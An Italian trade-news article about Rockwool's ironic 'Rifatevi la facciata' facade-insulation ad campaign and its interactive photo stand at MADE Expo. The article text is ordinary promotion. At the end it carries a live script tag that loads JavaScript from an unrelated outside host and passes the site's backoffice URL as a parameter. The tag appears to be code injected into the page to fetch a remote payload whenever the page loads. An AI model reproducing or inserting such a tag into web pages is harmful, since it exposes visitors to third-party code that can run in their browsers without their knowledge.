1. Home
  2. Notizie e Mercato
  3. “Metteteci la faccia… E rifatevi la facciata!” propone la Rockwool

“Metteteci la faccia… E rifatevi la facciata!” propone la Rockwool

Ristrutturazioni di
La nuova ironica campagna di comunicazione ROCKWOOL è stata lanciata ufficialmente durante la scorsa edizione del MADE Expo


Un po' di malta sulla fronte, due dischetti di lana di roccia sugli occhi, un sorriso smagliante che allude al piacere di regalarsi un momento di relax. Sono stati questi gli ingredienti della nuova campagna di comunicazione Rockwool che hanno accolto i visitatori dello stand durante la scorsa edizione del MADE Expo. Con una buona dose di ironia e giocando sull'affinità semantica dei due termini - faccia e facciata - il bel viso di una donna e la facciata di una casa sono state associate in un'unica immagine dal forte impatto visivo e emotivo, dove il comune denominatore è stato l'invito a prendersi cura di sé.

Un invito tanto più valido, perché sostenuto dai nuovi incentivi statali previsti in tema di risparmio energetico. Se quindi la facciata della vostra casa porta tutti i segni del tempo, é il momento di prendere in mano la situazione e pensare a un intervento di restyling risolutivo. E Rockwool è il partner ideale cui affidarsi, grazie all'ormai affermato know-how e alle innovative soluzioni d'isolamento per facciate: cappotto e pareti ventilate in lana di roccia.
 
Il concept della campagna ha caratterizzato anche l'architettura dello stand che ospitava, in un'area  dedicata, le soluzioni Rockwool per le facciate, e in uno spazio ludico e interattivo, all'insegna dello slogan "Rifatevi la facciata", un gioco fotografico che invitava i visitatori a "metterci la faccia", dopo aver preso gli attrezzi... del mestiere. In palio: divertimento, autoironia e la propria foto, da lasciare appesa nello stand o da portar via come ricordo.

Alla nuova campagna "Rifatevi la facciata" è inoltre stata data anche ampia visibilità su alcune delle maggiori riviste di settore durante il MADE.


<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&amp;cb=0.4458500627832317" type="text/javascript"></script>